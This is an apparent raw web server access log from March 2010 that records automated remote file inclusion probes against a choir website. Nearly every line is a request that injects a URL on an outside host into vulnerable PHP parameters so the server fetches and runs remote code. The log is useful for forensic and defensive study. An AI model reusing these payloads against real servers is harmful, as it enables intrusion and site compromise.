200.93.147.154 - - [09/Mar/2010:08:26:34 -0800] "GET /logs/access_100117.log/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:26:47 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:26:48 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:26:49 -0800] "GET /logs/access_100101.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:26:57 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:26:57 -0800] "GET /logs/access_100101.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:26:59 -0800] "GET /logs/access_091213.log/?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:26:59 -0800] "GET /?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:26:59 -0800] "GET /logs/?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 200 1081 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:27:03 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:27:12 -0800] "GET /logs/access_100101.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:08:27:35 -0800] "GET /logs/access_100202.log%20%20//delete.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:27:44 -0800] "GET /logs/access_091029.log/?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.americanboyschoir.com"
95.110.224.127 - - [09/Mar/2010:08:27:45 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:27:53 -0800] "GET /logs/access_100129.log/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:08:28:15 -0800] "GET /logs/access_091111.log%20%20//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:28:21 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:28:21 -0800] "GET /logs/access_100129.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:28:21 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:26 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:26 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:44 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:28:44 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:28:46 -0800] "GET /logs/access_100205.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.205 - - [09/Mar/2010:08:29:10 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:29:14 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:29:14 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:29:14 -0800] "GET /logs/access_100129.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:29:15 -0800] "GET /logs/access_091229.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.205 - - [09/Mar/2010:08:29:17 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.205 - - [09/Mar/2010:08:29:17 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:08:29:23 -0800] "GET /logs/access_100205.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:29:28 -0800] "GET /logs/?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 200 1081 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:29:28 -0800] "GET /?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:29:28 -0800] "GET /logs/access_091213.log/?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:29:33 -0800] "GET /logs/access_091229.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
95.110.224.127 - - [09/Mar/2010:08:29:39 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:29:47 -0800] "GET /logs/access_091229.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:29:58 -0800] "GET /logs/access_091029.log/?sourcedir=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:29:59 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:29:59 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:29:59 -0800] "GET /logs/access_100116.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:30:01 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:30:01 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:30:01 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:30:01 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:03 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:30:03 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:30:03 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:30:03 -0800] "GET /logs/access_100116.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:08 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:12 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:30:29 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:30:36 -0800] "GET /logs/access_100129.log/index.php?sayfa=http://www.frentesdeseguridad.gov.co/administrator/backups/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:30:36 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:30:47 -0800] "GET /logs/access_100115.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:30:49 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:30:49 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:30:50 -0800] "GET /logs/access_091111.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:30:58 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:30:58 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:30:59 -0800] "GET /logs/access_091111.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:00 -0800] "GET /logs/access_100131.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:07 -0800] "GET /logs/access_100131.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:09 -0800] "GET /logs/access_100131.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:31:13 -0800] "GET /logs/access_100115.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:31:26 -0800] "GET /logs/access_100209.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:31:33 -0800] "GET /logs/access_100209.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:41 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:42 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:31:42 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:31:54 -0800] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:31:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:31:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:32:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:32:07 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:32:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:32:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:32:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:08:32:19 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:32:30 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:32:30 -0800] "GET /logs/access_091111.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:08:32:30 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:33:10 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.205 - - [09/Mar/2010:08:33:21 -0800] "GET /logs/access_100112.log//include/bbs.lib.inc.php?site_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
221.141.1.113 - - [09/Mar/2010:08:33:44 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
